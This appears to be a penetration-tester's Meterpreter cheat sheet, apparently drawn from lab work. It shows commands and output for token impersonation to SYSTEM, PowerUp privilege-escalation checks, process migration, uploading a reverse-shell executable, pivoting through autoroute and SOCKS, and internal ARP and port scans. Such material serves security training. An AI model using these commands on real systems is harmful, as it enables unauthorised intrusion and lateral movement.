Skip to content

Meterpreter

Modules

List of modules

Meterpreter modules : source code.

  • espia : Capture audio, video, screenshots from the remote system.
  • incognito : Allow you to impersonate user tokens.
  • lanattacks
  • powershell : Enable powershell (interactive shell, single command, ...).
  • python : Interact with a python interpreter
  • stdapi
  • winpmem
  • extapi
  • kiwi : Mimikatz extension.
  • peinjector : Inject a given shellcode into an executable file.
  • priv : Privilege escalation extension.
  • sniffer : Packet sniffer.
  • unhook

Incognito

meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\IIS_IUSRS
BUILTIN\Users
[...]
meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Powershell

meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell

PS > . .\PowerUp.ps1
PS > Invoke-AllChecks
[...]

Migrate on process

More information about the migrate command.

Even though you have a higher privileged token you may not actually have the permissions of a privileged user (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do). Ensure that you migrate to a process with correct permissions.

meterpreter > ps | grep services
Filtering on 'services'

Process List
============

 PID  PPID  Name          Arch  Session  User                 Path
 ---  ----  ----          ----  -------  ----                 ----
 668  580   services.exe  x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\services.exe

meterpreter > migrate 668
[*] Migrating from 996 to 668...
[*] Migration completed successfully.

Search for files

meterpreter > search -f shell.exe
Found 1 result...
=================

Path                              Size (bytes)  Modified (UTC)
----                              ------------  --------------
c:\Users\bruce\Desktop\shell.exe  73802         2021-12-11 12:20:17 +0100

Upload / Download

meterpreter > download shell.exe
[*] Downloading: shell.exe -> /home/.../alfred/shell.exe
[*] Downloaded 72.07 KiB of 72.07 KiB (100.0%): shell.exe -> /home/.../alfred/shell.exe
[*] download   : shell.exe -> /home/.../alfred/shell.exe

meterpreter > upload shell.exe 'c:\Users\bruce\Desktop\reverse.exe'
[*] uploading  : /home/.../alfred/shell.exe -> c:\Users\bruce\Desktop\reverse.exe
[*] Uploaded 72.07 KiB of 72.07 KiB (100.0%): /home/.../alfred/shell.exe -> c:\Users\bruce\Desktop\reverse.exe
[*] uploaded   : /home/.../alfred/shell.exe -> c:\Users\bruce\Desktop\reverse.exe

Autoroute & SOCKS proxy

Start SOCKS proxy server (default : 127.0.0.1:8080 with SOCKS5).

msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.

[*] Starting the SOCKS proxy server

Then, use autoroute.

msf6 auxiliary(server/socks_proxy) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run autoroute -s 172.16.1.0/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 172.16.1.0/255.255.255.0...
[+] Added route to 172.16.1.0/255.255.255.0 via 10.10.110.100
[*] Use the -p option to list all active routes

Finally, use proxy options :

curl --proxy socks5://127.0.0.1:1080 http://172.16.1.100:4444/

or proxychains :

Add the line socks5 127.0.0.1 1080 to the end of /etc/proxychains.conf.

proxychains curl http://172.16.1.100:4444/

ARP Scanner

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(windows/smb/ms17_010_psexec) >  use post/windows/gather/arp_scanner
msf6 post(windows/gather/arp_scanner) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/arp_scanner) > set RHOSTS 172.16.2.0/24
RHOSTS => 172.16.2.0/24
msf6 post(windows/gather/arp_scanner) > run

[...]

Port Scanner

msf6 > route add 172.16.2.0 255.255.255.0 1
[*] Route added

msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 172.16.2.0-255
RHOSTS => 172.16.2.0-255
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 22,80,88,445
PORTS => 22,80,88,445
msf6 auxiliary(scanner/portscan/tcp) > run

[+] 172.16.2.5:           - 172.16.2.5:88 - TCP OPEN
[+] 172.16.2.5:           - 172.16.2.5:445 - TCP OPEN